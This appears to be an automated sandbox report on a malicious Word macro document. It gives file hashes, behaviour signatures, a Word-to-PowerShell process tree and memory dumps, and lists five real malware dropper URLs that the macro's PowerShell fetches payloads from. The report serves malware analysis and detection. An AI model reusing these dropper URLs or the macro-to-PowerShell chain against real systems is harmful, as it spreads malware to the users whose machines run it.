Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/06/2024, 04:41

General

  • Target: 9a61b87e8fa59338d740809f69c9e4f5_JaffaCakes118.doc
  • Size: 303KB
  • MD5: 9a61b87e8fa59338d740809f69c9e4f5
  • SHA1: a0986a11d09564898e5901ea1c9dbde2d1c18efd
  • SHA256: 94eb055dd2c9d3e339e4c12764b8f7242d4a1fe33a08e7f7820ade8c357faf93
  • SHA512: c68a90c1282bf6093310d10631cc632cfeee765ee3a6d19bc8ec3c62b172c0c071a3ab554a12fc2d058d472d24bd9eb00eb35f7d7e9f2e5175a7986bfb292a73
  • SSDEEP: 3072:4Nuje9H1visYgKUonh55BNDlqFfBC8QluuuJSeCCheHP91sjEwc9KJfeWZiH:CJ1DYgKvn75LY6c7EeCChevXlwc9Ky

Score
10/10

Malware Config

Extracted

Language: ps1
Deobfuscated

URLs

  • exe.dropper: http://idjvn.com/VFRvAVWyF8
  • exe.dropper: http://constructiondistrict.com/zA0jHm2vt
  • exe.dropper: http://www.bspartage.com/MofXXfVq
  • exe.dropper: http://adam-ch.com/OMKLfD9mZC
  • exe.dropper: http://galeriakolash.com.ve/RlGVXxAvx

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9a61b87e8fa59338d740809f69c9e4f5_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e 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
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1928

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
            Filesize: 20KB
            MD5: a8b514559afd8fba77b2cbd070dc8614
            SHA1: b36c2f629f47a44ad25379197fde874e1c2b3f83
            SHA256: f223f434791c0e37d57b003075894715ef86ae18e6452c78eddc62c7df4168e5
            SHA512: 2feeb8dfb708e85c646c0b77c15f311cf38de97a053e87f965505effe84315f6411281180617999bff3f26723b92c62ed8d60d1deecca7b3001b25aaf5ff49bf

          • memory/624-50-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-139-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-21-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-125-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-113-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-92-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-71-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-0-0x000000002F5C1000-0x000000002F5C2000-memory.dmp (Filesize: 4KB)
          • memory/624-2-0x0000000070EAD000-0x0000000070EB8000-memory.dmp (Filesize: 44KB)
          • memory/624-162-0x0000000070EAD000-0x0000000070EB8000-memory.dmp (Filesize: 44KB)
          • memory/624-124-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-161-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
          • memory/624-138-0x0000000070EAD000-0x0000000070EB8000-memory.dmp (Filesize: 44KB)
          • memory/624-39-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-140-0x0000000004F60000-0x0000000005060000-memory.dmp (Filesize: 1024KB)
          • memory/624-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
          • memory/1928-131-0x000000001B680000-0x000000001B962000-memory.dmp (Filesize: 2.9MB)
          • memory/1928-132-0x0000000002960000-0x0000000002968000-memory.dmp (Filesize: 32KB)